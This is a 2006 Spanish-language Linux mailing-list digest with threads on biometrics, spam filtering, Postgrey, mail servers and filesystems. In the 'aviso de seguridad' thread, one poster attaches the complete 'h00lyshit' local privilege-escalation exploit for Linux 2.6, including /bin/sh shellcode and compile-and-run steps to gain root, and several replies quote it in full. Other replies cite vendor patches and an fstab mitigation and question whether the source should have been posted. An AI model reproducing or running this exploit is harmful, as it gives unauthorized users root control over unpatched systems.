Dispositivos biometricos

2006-07-19 Por tema Patricio Bruna V.
El Martes, 18 de Julio de 2006 18:12, Carlos A. Sepulveda M. escribió:
 Holas:
 Alguien ha tenido experiencia, de preferencia positiva ;-), con el uso
 de dispositivos biometricos?
 Alguna marca recomendada/recomendable para uso en linux?
 La idea es accesarlos desde una aplicacion en Perl.

 Saludos
Si lo quieres usar con eDirectory (a través de NMAS), te sugiero que revises:
http://www.biometricsdirect.com/Products/SW/SAFLINK.htm

personalmente no lo he trabajado, pero tuve buenas recomendaciones por parte 
de un amigo venezolano.

Saludos.
-- 
Patricio Bruna V.
Red Hat Certified Engineer
IT Linux Ltda.
http://www.it-linux.cl
Fono/Fax: (+56-2) 697 11 66
Cel: (+56-8) 288 51 95


Por fín soporte NTFS RW?????

2006-07-19 Por tema Juan Ponce R
El mar, 18-07-2006 a las 09:50 -0400, David Aravena escribió:
 Amigos listeros hoy me llego esta noticia. 
 
 http://sourceforge.net/mailarchive/forum.php?thread_id=23836054forum_id=2697
 
 Será cierto??? Espero que si es cierto no sea tan venenoso como los
 conocidos captive y paragon.
 eso.
 
 Saludos
 
 
 -- 
 David Aravana A.

lo acabo de probar en gentoo linux y es bastante bueno y mas rapido k
captive

hasta el momento lo he encontrado muy bueno


Dispositivos biometricos

2006-07-19 Por tema Carlos A. Sepulveda M.
Felipe Tornvall wrote:
 yo estuve viendo unos sitios en usa que venden articulos con tec bio, que 
 dispositivo buscas? podrias ser mas especifico ? ocular.. digital con 
 bd...
 

digital, con que mande la imagen me basta.

Saludos y gracias
-- 
Carlos A. Sepúlveda M.
Jefe de Proyectos
Linux Center Latin America
Tel: (562)4834000; Fax: (562)4834050
[EMAIL PROTECTED]
http://www.linuxcenterla.com
From [EMAIL PROTECTED]  Wed Jul 19 09:39:23 2006
From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?Jos=E9_Miguel_Vidal_?=Lavin)
Date: Wed Jul 19 10:26:10 2006
Subject: AYUDA CONTRA SPAM
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

On Tue, 18 Jul 2006 10:52:23 -0400, Dario Guzman wrote
 Hola
 
 Les comento cual es mi situación.
 
 Actualmente dispongo de un equipo que funciona como 
 servidor de Internet para una red de 20 equipos, este tiene 
 instalado Red Hat 9, tiene configurado FETCHMAIL para bajar los 
 correos, eso es todo.Originalmente este servidor 
 filtraría los Spam, pero nunca lo terminaron de configurar, lo cual 
 se convierte en mi tarea. He investigado acerca del tema, pero el 
 información pero la información que he encontrado es un poco antigua,
  hablan de fetchmail, procmail, spamassassin. Necesito de vuestra 
 ayuda y cooperación para llegar a un buen resultado.
 
 Lamentablemente mis conocimientos en la plataforma de 
 Linux no son los mejores, pero intento hacer lo mejor que puedo y 
 por lo que me he informado mucho.
 
 Atentamente
 Dario Guzman
 
 “Este Mensaje esta destinado para el uso de la o las personas o 
 entidades a quien ha sido dirigido y puede contener información 
 reservada y confidencial que no puede ser divulgada, difundida, ni 
 aprovechada en forma alguna. El uso no autorizado de la información 
 contenida en este correo podrá ser sancionado de conformidad con la 
 ley Chilena vigente.
 
 Si usted ha recibido este correo electrónico por error, le pedimos
 eliminarlo junto con los archivos adjuntos y avisar inmediatamente al
 remitente, respondiendo este mensaje.”

la documentacion que tienes debe ser muuy antigua si no te funciona
para redhat 9, parte actualizando la maquina a una distro vigente y asi podras
utilizar las herramientas que estan disponibles en estos momentos, parchar una
maquina antigua es lo peor que podrias hacer.

saludos

pd: si usas redhat seria claro pasarte a FC 4 pero de preferencia debian ;)
--
José Miguel Vidal Lavin
Usuario Linux


Problema con Postgrey

2006-07-19 Por tema Edison Caprile Pons
Hola Lista:

 

Tengo un problema con Postgrey, este anda bien pero cuando me mandan un
mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me
manda un mensaje el Postfix que dice: Client host rejected:access
denied..estas casillas las tengo habilitadas desde el archivo access de
Postfix...y bien configurado en el main.cfesto funcionaba antes...pero
Postgrey me debe haber bloqueado esos dominios a raiz que algunas casillas
tipo SPAM no respondieron a la solicitud de reenvio de Postgrey.no se
donde puedo desbloquear si es que estoy en lo cierto en toda la platica
anterior..me pueden ayudar please...

 

Gracias.

 

Atte.

Edison.

 próxima parte 
Se ha borrado un adjunto en formato HTML...
URL: 
http://listas.inf.utfsm.cl/pipermail/linux/attachments/20060719/5382aa6b/attachment.html
From [EMAIL PROTECTED]  Wed Jul 19 12:46:52 2006
From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?=22Manuel_R=2E_Berci=E1n=22?=)
Date: Wed Jul 19 12:36:52 2006
Subject: Servidor de Correo Open SuSE 10
Message-ID: [EMAIL PROTECTED]

Estimados amigos!!

Tengo un problema con mi servidor de correo, Open SuSE 10, resulta 
que cambiamos nuestro servidor a este,
con las siguientes configuraciones Ldap + Postfix + Courier + Amavis + 
Spamassasin + Clamav

1. Pero por el momento no se como poner un mensaje de respuesta 
automatica de vacaciones a usuarios,
alguien tiene idea de como hacerlo.

2. Otra pregunta, como direccionar correos de una cuenta a otra direccion.

3. Al haber direccionado la cuenta a otra direccion supongo que ya le 
llegaran tanto a esa cuenta como a la otra,
pero los nuevos que le envien!!,
Y los emails que ya estaban en ese buzon?, como hago para trasladarlos.

Quiza es que no encuentro la informacion adecuada para hacerlo, y 
tambien me pueden decir que leer o
articulos que conozcan, para estudiar mas del asunto y asi lograrlo.

De antemano muchas Gracias por su Ayuda!!

Manuel R. Bercián
From [EMAIL PROTECTED]  Wed Jul 19 12:25:41 2006
From: [EMAIL PROTECTED] (Carlos A. Sepulveda M.)
Date: Wed Jul 19 13:24:13 2006
Subject: Problema con Postgrey
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Edison Caprile Pons wrote:
 Hola Lista:
 
  
 
 Tengo un problema con Postgrey, este anda bien pero cuando me mandan un
 mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me
 manda un mensaje el Postfix que dice: Client host rejected:access
 denied..
Holas:
Asi es como funciona greylisting.
Todos los servers son malos, hasta que demuestren lo contrario. ;-)
En resumen, cada vez que recibe un correo lo rechaza con la instruccion 
de reintertar despues, al reintentar el servidor lo deja pasar. (el 
principio es uqe los spammers no reintentan)

Saludos
-- 
Carlos A. Sepúlveda M.
Jefe de Proyectos
Linux Center Latin America
Tel: (562)4834000; Fax: (562)4834050
[EMAIL PROTECTED]
http://www.linuxcenterla.com
From [EMAIL PROTECTED]  Wed Jul 19 13:15:48 2006
From: [EMAIL PROTECTED] (Pablo Bitreras)
Date: Wed Jul 19 13:46:46 2006
Subject: Problema con Postgrey
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Edison,  Edita los archivos

 /etc/postgrey/whitelist_clients :  Por si quieres que  pase como lista 
blanca desde algún servidor en especial.  (agregando yahoo.com o vtr.net)
 /etc/postgrey/whitelist_recipients :  si quieres que pase hacia algún 
usuario ([EMAIL PROTECTED])

Saludos

Edison Caprile Pons escribió:

 Hola Lista:

  

 Tengo un problema con Postgrey, este anda bien pero cuando me mandan 
 un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, 
 etc-me manda un mensaje el Postfix que dice: Client host 
 rejected:access denied..estas casillas las tengo habilitadas desde 
 el archivo access de Postfix...y bien configurado en el 
 main.cfesto funcionaba antes...pero Postgrey me debe haber 
 bloqueado esos dominios a raiz que algunas casillas tipo SPAM no 
 respondieron a la solicitud de reenvio de Postgrey.no se donde 
 puedo desbloquear si es que estoy en lo cierto en toda la platica 
 anterior..me pueden ayudar please...

  

 Gracias.

  

 Atte.

 Edison.




Problema con Postgrey

2006-07-19 Por tema Edison Caprile Pons
Si, entiendo el concepto.pero se trata de dominios vtr.net, Hotmail.com,
yahoo.com, yahoo.es, etc..que me imagino estan bien configurados...ademas
los dejo pasar por medio de la lista de access de postfixpero ahora no
funciona...sera por el propio Postgrey??---como le digo a Postgrey que me
deje pasar algunas cuentas o dominios??...intente con un archivo por defecto
que trae pero no pasa nada...alguna ayuda please...

Gracias por los comentarios.

-Mensaje original-
De: Carlos A. Sepulveda M. [mailto:[EMAIL PROTECTED] 
Enviado el: Miércoles, 19 de Julio de 2006 12:26
Para: Discusion de Linux en Castellano
Asunto: Re: Problema con Postgrey

Edison Caprile Pons wrote:
 Hola Lista:
 
  
 
 Tengo un problema con Postgrey, este anda bien pero cuando me mandan un
 mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, etc-me
 manda un mensaje el Postfix que dice: Client host rejected:access
 denied..
Holas:
Asi es como funciona greylisting.
Todos los servers son malos, hasta que demuestren lo contrario. ;-)
En resumen, cada vez que recibe un correo lo rechaza con la instruccion 
de reintertar despues, al reintentar el servidor lo deja pasar. (el 
principio es uqe los spammers no reintentan)

Saludos
-- 
Carlos A. Sepúlveda M.
Jefe de Proyectos
Linux Center Latin America
Tel: (562)4834000; Fax: (562)4834050
[EMAIL PROTECTED]
http://www.linuxcenterla.com

-
This mail was scanned by a trial version of BitDefender
For more informations please visit http://www.bitdefender.com


-



Problema con Postgrey

2006-07-19 Por tema Edison Caprile Pons
Gracias...y con que comando genero la base una vez modificada??..ej: postmap
archivo...

-Mensaje original-
De: Pablo Bitreras [mailto:[EMAIL PROTECTED] 
Enviado el: Miércoles, 19 de Julio de 2006 13:16
Para: Discusion de Linux en Castellano
Asunto: Re: Problema con Postgrey

Edison,  Edita los archivos

 /etc/postgrey/whitelist_clients :  Por si quieres que  pase como lista 
blanca desde algún servidor en especial.  (agregando yahoo.com o vtr.net)
 /etc/postgrey/whitelist_recipients :  si quieres que pase hacia algún 
usuario ([EMAIL PROTECTED])

Saludos

Edison Caprile Pons escribió:

 Hola Lista:

  

 Tengo un problema con Postgrey, este anda bien pero cuando me mandan 
 un mensaje de ciertas casillas de dominios como yahoo, Hotmail, vtr, 
 etc-me manda un mensaje el Postfix que dice: Client host 
 rejected:access denied..estas casillas las tengo habilitadas desde 
 el archivo access de Postfix...y bien configurado en el 
 main.cfesto funcionaba antes...pero Postgrey me debe haber 
 bloqueado esos dominios a raiz que algunas casillas tipo SPAM no 
 respondieron a la solicitud de reenvio de Postgrey.no se donde 
 puedo desbloquear si es que estoy en lo cierto en toda la platica 
 anterior..me pueden ayudar please...

  

 Gracias.

  

 Atte.

 Edison.




-
This mail was scanned by a trial version of BitDefender
For more informations please visit http://www.bitdefender.com


-



Dispositivos biometricos

2006-07-19 Por tema Felipe Tornvall
On Wednesday 19 July 2006 09:08, Carlos A. Sepulveda M. wrote:
 Felipe Tornvall wrote:
  yo estuve viendo unos sitios en usa que venden articulos con tec bio,
  que dispositivo buscas? podrias ser mas especifico ? ocular.. digital
  con bd...

 digital, con que mande la imagen me basta.

 Saludos y gracias
pero quieres comunicarlo con alguna bd ? acuerdate que necesitas el sdk del 
software !!! asegurate de que venga- creo q esos q traen el sdk son los 
unicos que te sirven,

-- 
___
Felipe Tornvall N.  lu: 400327
w: http://freeby.pctools.cl 
w: http://docs.pctools.cl
w: http://linux.pctools.cl



aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Felipe Tornvall
hola lista arreglar fstab



proc/proc   procdefaults0   0

agregarlo a la primera linea si ya esta... no hay de q preocuparse
prueba:
crear archivo de 100 mg enb la home del user
yes  xxx
luego compilar
gcc -o archivo source.c
ejecutar
./archivo xxx
y listo !! estas como root

bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados 
hace una semana no pasa nada (via net install)


*
** Author: h00lyshit
** Vulnerable: Linux 2.6 ALL
** Type of Vulnerability: Local Race
** Tested On : various distros
** Vendor Status: unknown
**
** Disclaimer:
** In no event shall the author be liable for any damages
** whatsoever arising out of or in connection with the use
** or spread of this information.
** Any use of this information is at the user's own risk.
**
** Compile:
** gcc h00lyshit.c -o h00lyshit
**
** Usage:
** h00lyshit very big file on the disk
**
** Example:
** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
**
** if y0u dont have one, make big file (~100MB) in /tmp with dd
** and try to junk the cache e.g. cat /usr/lib/* /dev/null
**
*/

#include stdio.h
#include stdlib.h
#include string.h
#include unistd.h
#include fcntl.h
#include errno.h
#include sched.h
#include sys/types.h
#include sys/stat.h
#include sys/prctl.h
#include sys/mman.h
#include sys/wait.h
#include linux/a.out.h
#include asm/unistd.h


static struct exec ex;
static char *e[256];
static char *a[4];
static char b[512];
static char t[256];
static volatile int *c;


/*  h00lyshit shell code*/
__asm__ (  __excode:   call1f  \n
   1:  mov $23, %eax   \n
   xor %ebx, %ebx  \n
   int $0x80   \n
   pop %eax\n
   mov $cmd-1b, %ebx   \n
   add %eax, %ebx  \n
   mov $arg-1b, %ecx   \n
   add %eax, %ecx  \n
   mov %ebx, (%ecx)\n
   mov %ecx, %edx  \n
   add $4, %edx\n
   mov $11, %eax   \n
   int $0x80   \n
   mov $1, %eax\n
   int $0x80   \n
   arg:.quad   0x00, 0x00  \n
   cmd:.string \/bin/sh\ \n
   __excode_e: nop \n
   .global __excode\n
   .global __excode_e  \n
);



extern void (*__excode) (void);
extern void (*__excode_e) (void);


void
error (char *err)
{
  perror (err);
  fflush (stderr);
  exit (1);
}


/*  exploit this shit   */
void
exploit (char *file)
{
  int i, fd;
  void *p;
  struct stat st;

  printf (\ntrying to exploit %s\n\n, file);
  fflush (stdout);
  chmod (/proc/self/environ, 04755);
  c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0, 
0);
  memset ((void *) c, 0, 4096);

  /*  slow down machine   */
  fd = open (file, O_RDONLY);
  fstat (fd, st);
  p =
(void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
  if (p == MAP_FAILED)
error (mmap);
  prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
  sprintf (t, /proc/%d/environ, getpid ());
  sched_yield ();
  execve (NULL, a, e);
  madvise (0, 0, MADV_WILLNEED);
  i = fork ();

  /*  give it a try   */
  if (i)
{   
  (*c)++;
  !madvise (p, st.st_size, MADV_WILLNEED) ? : error (madvise);
  prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
  sched_yield ();   
}
  else
{
nice(10);
while (!(*c));
sched_yield ();
  execve (t, a, e);
  error (failed);
}

  waitpid (i, NULL, 0);
  exit (0);
}


int
main (int ac, char **av)
{
  int i, j, k, s;
  char *p;

  memset (e, 0, sizeof (e));
  memset (a, 0, sizeof (a));
  a[0] = strdup (av[0]);
  a[1] = strdup (av[0]);
  a[2] = strdup (av[1]);

  if (ac  2)
error (usage: binary big file name);
  if (ac  2)
exploit (av[2]);
  printf (\npreparing);
  fflush (stdout);

  /*  make setuid a.out   */
  memset (ex, 0, sizeof (ex));
  N_SET_MAGIC (ex, NMAGIC);
  N_SET_MACHTYPE (ex, M_386);
  s = ((unsigned) __excode_e) - (unsigned) __excode;
  ex.a_text = s;
  ex.a_syms = -(s + sizeof (ex));

  memset (b, 0, sizeof (b));
  memcpy (b, ex, sizeof (ex));
  memcpy (b + sizeof (ex), __excode, s);

  /*  make environment*/
  p = b;
  s += sizeof (ex);
  j = 0;
  for (i = k = 0; i  s; i++)
{
  

aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Matias Valdenegro T.
El Wednesday, 19 de July de 2006 16:54, Felipe Tornvall escribió:
 hola lista arreglar fstab



 proc/proc   procdefaults0   0

 agregarlo a la primera linea si ya esta... no hay de q preocuparse

Sarge viene asi por defecto, me imagino que el resto de las distribuciones 
tambien :)


aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Daniel Serpell
Hola!

El Wed, Jul 19, 2006 at 04:54:46PM -0400, Felipe Tornvall escribio:
 
 prueba:
 crear archivo de 100 mg enb la home del user
 yes  xxx
 luego compilar
 gcc -o archivo source.c
 ejecutar
 ./archivo xxx
 y listo !! estas como root
[...]

Arreglado en:

Debian Sarge: DSA--1, 16/7/2006
Ubuntu 6.06:  USN-319-1, 18/7/2006

Otras distribuciones, ya pronto estará el parche disponible.

Daniel.


aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema dblackbeer
2006/7/19, Felipe Tornvall [EMAIL PROTECTED]:
 hola lista arreglar fstab



 proc/proc   procdefaults0   0

 agregarlo a la primera linea si ya esta... no hay de q preocuparse
 prueba:
 crear archivo de 100 mg enb la home del user
 yes  xxx
 luego compilar
 gcc -o archivo source.c
 ejecutar
 ./archivo xxx
 y listo !! estas como root

 bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados
 hace una semana no pasa nada (via net install)


 *
 ** Author: h00lyshit
 ** Vulnerable: Linux 2.6 ALL
 ** Type of Vulnerability: Local Race
 ** Tested On : various distros
 ** Vendor Status: unknown
 **
 ** Disclaimer:
 ** In no event shall the author be liable for any damages
 ** whatsoever arising out of or in connection with the use
 ** or spread of this information.
 ** Any use of this information is at the user's own risk.
 **
 ** Compile:
 ** gcc h00lyshit.c -o h00lyshit
 **
 ** Usage:
 ** h00lyshit very big file on the disk
 **
 ** Example:
 ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
 **
 ** if y0u dont have one, make big file (~100MB) in /tmp with dd
 ** and try to junk the cache e.g. cat /usr/lib/* /dev/null
 **
 */

 #include stdio.h
 #include stdlib.h
 #include string.h
 #include unistd.h
 #include fcntl.h
 #include errno.h
 #include sched.h
 #include sys/types.h
 #include sys/stat.h
 #include sys/prctl.h
 #include sys/mman.h
 #include sys/wait.h
 #include linux/a.out.h
 #include asm/unistd.h


 static struct exec ex;
 static char *e[256];
 static char *a[4];
 static char b[512];
 static char t[256];
 static volatile int *c;


 /*  h00lyshit shell code*/
 __asm__ (  __excode:   call1f  \n
1:  mov $23, %eax   \n
xor %ebx, %ebx  \n
int $0x80   \n
pop %eax\n
mov $cmd-1b, %ebx   \n
add %eax, %ebx  \n
mov $arg-1b, %ecx   \n
add %eax, %ecx  \n
mov %ebx, (%ecx)\n
mov %ecx, %edx  \n
add $4, %edx\n
mov $11, %eax   \n
int $0x80   \n
mov $1, %eax\n
int $0x80   \n
arg:.quad   0x00, 0x00  \n
cmd:.string \/bin/sh\ \n
__excode_e: nop \n
.global __excode\n
.global __excode_e  \n
 );



 extern void (*__excode) (void);
 extern void (*__excode_e) (void);


 void
 error (char *err)
 {
   perror (err);
   fflush (stderr);
   exit (1);
 }


 /*  exploit this shit   */
 void
 exploit (char *file)
 {
   int i, fd;
   void *p;
   struct stat st;

   printf (\ntrying to exploit %s\n\n, file);
   fflush (stdout);
   chmod (/proc/self/environ, 04755);
   c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0,
 0);
   memset ((void *) c, 0, 4096);

   /*  slow down machine   */
   fd = open (file, O_RDONLY);
   fstat (fd, st);
   p =
 (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
   if (p == MAP_FAILED)
 error (mmap);
   prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
   sprintf (t, /proc/%d/environ, getpid ());
   sched_yield ();
   execve (NULL, a, e);
   madvise (0, 0, MADV_WILLNEED);
   i = fork ();

   /*  give it a try   */
   if (i)
 {
   (*c)++;
   !madvise (p, st.st_size, MADV_WILLNEED) ? : error (madvise);
   prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
   sched_yield ();
 }
   else
 {
 nice(10);
 while (!(*c));
 sched_yield ();
   execve (t, a, e);
   error (failed);
 }

   waitpid (i, NULL, 0);
   exit (0);
 }


 int
 main (int ac, char **av)
 {
   int i, j, k, s;
   char *p;

   memset (e, 0, sizeof (e));
   memset (a, 0, sizeof (a));
   a[0] = strdup (av[0]);
   a[1] = strdup (av[0]);
   a[2] = strdup (av[1]);

   if (ac  2)
 error (usage: binary big file name);
   if (ac  2)
 exploit (av[2]);
   printf (\npreparing);
   fflush (stdout);

   /*  make setuid a.out   */
   memset (ex, 0, sizeof (ex));
   N_SET_MAGIC (ex, NMAGIC);
   N_SET_MACHTYPE (ex, M_386);
   s = ((unsigned) __excode_e) - (unsigned) __excode;
   ex.a_text = s;
   ex.a_syms = -(s + sizeof (ex));

   memset (b, 0, sizeof (b));
   

aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Marcelo Diaz
PORQUE EN MI FEDORA 3 DESACTUALIZADO DESDE HACE 2 AÑOS
ME DA EL SIGUIENTE ERROR

//
[EMAIL PROTECTED]'s password:
Last login: Wed Jul 19 18:25:59 2006
[EMAIL PROTECTED] ~]$ ./archivo xxx

preparing
trying to exploit xxx

failed: Permission denied
[EMAIL PROTECTED] ~]$


No sera un problema de DEBIAN?







2006/7/19, Felipe Tornvall [EMAIL PROTECTED]:
 hola lista arreglar fstab



 proc/proc   procdefaults0   0

 agregarlo a la primera linea si ya esta... no hay de q preocuparse
 prueba:
 crear archivo de 100 mg enb la home del user
 yes  xxx
 luego compilar
 gcc -o archivo source.c
 ejecutar
 ./archivo xxx
 y listo !! estas como root

 bajo amd64 no corre pero si me funciono en un sarge i386 pero los instalados
 hace una semana no pasa nada (via net install)


 *
 ** Author: h00lyshit
 ** Vulnerable: Linux 2.6 ALL
 ** Type of Vulnerability: Local Race
 ** Tested On : various distros
 ** Vendor Status: unknown
 **
 ** Disclaimer:
 ** In no event shall the author be liable for any damages
 ** whatsoever arising out of or in connection with the use
 ** or spread of this information.
 ** Any use of this information is at the user's own risk.
 **
 ** Compile:
 ** gcc h00lyshit.c -o h00lyshit
 **
 ** Usage:
 ** h00lyshit very big file on the disk
 **
 ** Example:
 ** h00lyshit /usr/X11R6/lib/libethereal.so.0.0.1
 **
 ** if y0u dont have one, make big file (~100MB) in /tmp with dd
 ** and try to junk the cache e.g. cat /usr/lib/* /dev/null
 **
 */

 #include stdio.h
 #include stdlib.h
 #include string.h
 #include unistd.h
 #include fcntl.h
 #include errno.h
 #include sched.h
 #include sys/types.h
 #include sys/stat.h
 #include sys/prctl.h
 #include sys/mman.h
 #include sys/wait.h
 #include linux/a.out.h
 #include asm/unistd.h


 static struct exec ex;
 static char *e[256];
 static char *a[4];
 static char b[512];
 static char t[256];
 static volatile int *c;


 /*  h00lyshit shell code*/
 __asm__ (  __excode:   call1f  \n
1:  mov $23, %eax   \n
xor %ebx, %ebx  \n
int $0x80   \n
pop %eax\n
mov $cmd-1b, %ebx   \n
add %eax, %ebx  \n
mov $arg-1b, %ecx   \n
add %eax, %ecx  \n
mov %ebx, (%ecx)\n
mov %ecx, %edx  \n
add $4, %edx\n
mov $11, %eax   \n
int $0x80   \n
mov $1, %eax\n
int $0x80   \n
arg:.quad   0x00, 0x00  \n
cmd:.string \/bin/sh\ \n
__excode_e: nop \n
.global __excode\n
.global __excode_e  \n
 );



 extern void (*__excode) (void);
 extern void (*__excode_e) (void);


 void
 error (char *err)
 {
   perror (err);
   fflush (stderr);
   exit (1);
 }


 /*  exploit this shit   */
 void
 exploit (char *file)
 {
   int i, fd;
   void *p;
   struct stat st;

   printf (\ntrying to exploit %s\n\n, file);
   fflush (stdout);
   chmod (/proc/self/environ, 04755);
   c = mmap (0, 4096, PROT_READ | PROT_WRITE, MAP_SHARED | MAP_ANONYMOUS, 0,
 0);
   memset ((void *) c, 0, 4096);

   /*  slow down machine   */
   fd = open (file, O_RDONLY);
   fstat (fd, st);
   p =
 (void *) mmap (0, st.st_size, PROT_READ | PROT_WRITE, MAP_PRIVATE, fd, 0);
   if (p == MAP_FAILED)
 error (mmap);
   prctl (PR_SET_DUMPABLE, 0, 0, 0, 0);
   sprintf (t, /proc/%d/environ, getpid ());
   sched_yield ();
   execve (NULL, a, e);
   madvise (0, 0, MADV_WILLNEED);
   i = fork ();

   /*  give it a try   */
   if (i)
 {
   (*c)++;
   !madvise (p, st.st_size, MADV_WILLNEED) ? : error (madvise);
   prctl (PR_SET_DUMPABLE, 1, 0, 0, 0);
   sched_yield ();
 }
   else
 {
 nice(10);
 while (!(*c));
 sched_yield ();
   execve (t, a, e);
   error (failed);
 }

   waitpid (i, NULL, 0);
   exit (0);
 }


 int
 main (int ac, char **av)
 {
   int i, j, k, s;
   char *p;

   memset (e, 0, sizeof (e));
   memset (a, 0, sizeof (a));
   a[0] = strdup (av[0]);
   a[1] = strdup (av[0]);
   a[2] = strdup (av[1]);

   if (ac  2)
 error (usage: 

aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Leonardo Soto M.
On 7/19/06, Alfredo Ramirez [EMAIL PROTECTED] wrote:
 Mi debian tiene esa linea

  proc/proc   procdefaults0   0

 y el exploit anduvo igual, mañana instalo una distro mas segura que no
 sea derivada de debian.

Vas a tener que instalar una que no tenga el kernel linux, pues el
problema esta allí.

Y en ese caso ya no sería una distro Linux...

-- 
Leonardo Soto M.


aviso de seguridad - importante ver EXPLOIT adjunto

2006-07-19 Por tema Juan Martínez
Felipe Tornvall escribió:
 hola lista arreglar fstab
 
 proc/proc   procdefaults0   0
 
 agregarlo a la primera linea si ya esta... no hay de q preocuparse
 prueba:
 crear archivo de 100 mg enb la home del user
 yes  xxx
 luego compilar
 gcc -o archivo source.c
 ejecutar
 ./archivo xxx
 y listo !! estas como root

http://www.debian.org/security/2006/dsa-

Esto es exclusivamente para la rama del kernel 2.6.8.

El lunes, al hacer diariamente apt-get update  apt-get dist-upgrade, 
me di cuenta que se descargo kernel-image-2.6.8. Luego mire en los 
avisos de seguridad de debian de que se trataba...

De todas maneras la recomendacion es cambiar en la linea de /etc/fstab 
de proc, defaults por noexec nosuid.

Es buena idea mandar el source del exploit por aqui?

Lo digo para no alentar a algun lammer que este entre nosotros...

-- 
Juan Martinez G.
Departamento de Informatica
Universidad Miguel de Cervantes
From [EMAIL PROTECTED]  Wed Jul 19 19:17:07 2006
From: [EMAIL PROTECTED] (=?ISO-8859-1?Q?Juan_Mart=EDnez?=)
Date: Wed Jul 19 20:05:23 2006
Subject: aviso de seguridad - importante ver EXPLOIT adjunto
In-Reply-To: [EMAIL PROTECTED]
References: [EMAIL PROTECTED]
[EMAIL PROTECTED]
Message-ID: [EMAIL PROTECTED]

Alfredo Ramirez escribió:
 Mi debian tiene esa linea
 
 proc/proc   procdefaults0   0
 

Miraste los avisos de seguridad de Debian?

 y el exploit anduvo igual, mañana instalo una distro mas segura que no
 sea derivada de debian.

Claro... te recomiendo:

Hasefrosh 2007, ultra edition professionly unsecure
:D

-- 
Juan Martinez G.
Departamento de Informatica
Universidad Miguel de Cervantes
From [EMAIL PROTECTED]  Wed Jul 19 18:36:39 2006
From: [EMAIL PROTECTED] (Horst von Brand)
Date: Wed Jul 19 21:40:59 2006
Subject: Inodos 
In-Reply-To: Your message of Mon, 17 Jul 2006 22:28:26 -0400.
[EMAIL PROTECTED] 
Message-ID: [EMAIL PROTECTED]

Juan Ponce R [EMAIL PROTECTED] wrote:
 el odio hacia reiserfs de algunos para mi no es mas que FUD

Las razones estan muy bien resumidas en 
http://wiki.kernelnewbies.org/WhyReiser4IsNotIn

 he usado durante años reiserfs y 0 problemas, de hecho la unica vez que
 tuve una perdida de datos fue cuando tenia un disco con ext3,
 coincidencia?, mala suerte?, no se...

Coincidencia + mala (pesima) suerte.

 pero yo confio TODOS mis datos a reiserfs y jamas me ha decepcionado :)

Bien por ti. Que la suerte te siga sonriendo.
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 654431
Universidad Tecnica Federico Santa Maria  +56 32 654239
Casilla 110-V, Valparaiso, ChileFax:  +56 32 797513


AYUDA CONTRA SPAM

2006-07-19 Por tema Horst von Brand
Dario Guzman [EMAIL PROTECTED] wrote:
 Confío en lo que me indiquen ustedes
 Así que cuales son los pasos a seguir... y que es lo que se está utilizando
 ahora

sendmail + milter-greylist + clamav

Para volumenes /chicos/ sirve http://www.spamhaus.org (con volumenes
grandes las consultas a DNS simplemente no las responde == correo se queda
colgado; habria que optar por la opcion $$$)
-- 
Dr. Horst H. von Brand   User #22616 counter.li.org
Departamento de Informatica Fono: +56 32 654431
Universidad Tecnica Federico Santa Maria  +56 32 654239
Casilla 110-V, Valparaiso, ChileFax:  +56 32 797513


linux + seguridad + libro ¿cual escojo?

2006-07-19 Por tema Horst von Brand
NYARLATHOTEP El Caos Reptante [EMAIL PROTECTED] wrote:
 debido a algunos problemas tecnicos he decidido aumentar mi humilde
 biblioteca y les pregunto que libros me recomiendan.
 
 los que he estado mirando en amazon son:
 
 Hacking Linux Exposed, Second Edition

Los libros de hacking a mi no me atraen particularmente, seguridad es
/mucho/ mas que estarse preocupando de como hacer enloquecer programas.

 Maximum Linux Security (2nd Edition)

Ni idea.

 SELinux: NSA's Open Source Security Enhanced Linu

SELinux definitivamente se viene, pero le falta un buen resto para uso a lo
ancho. Y cambia rapidamente... lo mas sano es partir con un RHEL (o CentOS,
o Fedora) y tirarle dedo. Es /muy/ efectivo, pero duro de usar.

 Counter Hack: A Step-by-Step Guide to Computer Attacks and Effective
 Defenses

Lo de step-by-step me huele mal. Y, repito, computer attacks !=
effective security, mas bien, hay a lo mas una relacion tenue entre las
dos.

 Linux Network Security (Administrator's Advantage Series)

Por el titulo...

 El que me ha llamado la atencion por los comentarios del los lectores
 es Hacking Linux Exposed, Second Edition, pero como no tengo mayor
 conocimiento en libros del tema, esperaba que me pudieran ayudar en
 ese tema...

Date una vuelta por http://www.tldp.org, revisa la docu para tu
distro. Demas hay comentarios sobre seguridad. Es muy util Bastille Linux
(un conjunto de scripts para endurecer Unices (apunta a RHEL y HP-UX mas
que nada, pero es aplicable mucho mas alla).

Y para seguridad en Linux:

- Instalar lo justo y necesario
- Configurar con cuidado
